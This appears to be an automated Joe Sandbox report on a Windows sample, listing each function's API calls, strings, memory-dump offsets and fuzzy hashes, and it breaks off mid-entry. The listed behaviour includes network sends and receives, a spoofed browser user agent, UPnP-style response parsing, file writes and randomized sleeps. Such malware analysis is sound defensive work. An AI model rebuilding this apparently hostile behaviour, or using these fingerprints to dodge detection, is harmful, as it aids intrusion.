LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8

Strings

.ou, xrefs: 0040629D

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID: .ou
API String ID: 1457358591-3683031111
Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Sleep.KERNEL32(000003E8), ref: 0040D8EE
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

HTTP/1.1 200 OK, xrefs: 0040D8FF
LOCATION: , xrefs: 0040D915

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C

Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
InternetCloseHandle.WININET(00000000), ref: 0040EAB8
InternetCloseHandle.WININET(00000000), ref: 0040EAC2
Sleep.KERNEL32(000003E8), ref: 0040EACD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55

Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

deviceType, xrefs: 0040E306
device, xrefs: 0040E2F3

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95

Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9

Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

deviceType, xrefs: 0040E306
device, xrefs: 0040E2F3

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95

Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95

Function 0040AB80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A

Strings

.ou, xrefs: 0040AC4D

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID: .ou
API String ID: 442028454-3683031111
Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59

Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 004074BD
Sleep.KERNEL32(000003E8), ref: 004074EC
wsprintfA.USER32 ref: 00407517
DeleteUrlCacheEntry.WININET(?), ref: 00407527
Sleep.KERNEL32(000DBBA0), ref: 0040756F

Strings

%s%s, xrefs: 0040750B

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A

Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063A6
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
RegCloseKey.ADVAPI32(?), ref: 0040643E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
NoDrives, xrefs: 00406418

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99

Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184

Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54

Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407376
srand.MSVCRT ref: 0040737D
rand.MSVCRT ref: 00407385
Sleep.KERNEL32 ref: 00407396
StrChrA.SHLWAPI(00000000,0000007C), ref: 004073BC
Sleep.KERNEL32(000003E8), ref: 004073ED

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56

Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408EBD
_aullshr.NTDLL ref: 00408ECE
_allshl.NTDLL ref: 00408EF0
_aullshr.NTDLL ref: 00408F0C
_allshl.NTDLL ref: 00408F2E
_aullshr.NTDLL ref: 00408F4A

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7

Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040D429
CloseHandle.KERNEL32(?), ref: 0040D458
LeaveCriticalSection.KERNEL32(?), ref: 0040D467
DeleteCriticalSection.KERNEL32(?), ref: 0040D474

Strings

.ou, xrefs: 0040D458

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID: .ou
API String ID: 3102160386-3683031111
Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95

Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B

Strings

pdu, xrefs: 00401339
.ou, xrefs: 0040135C

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu$.ou
API String ID: 309973729-2706015961
Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
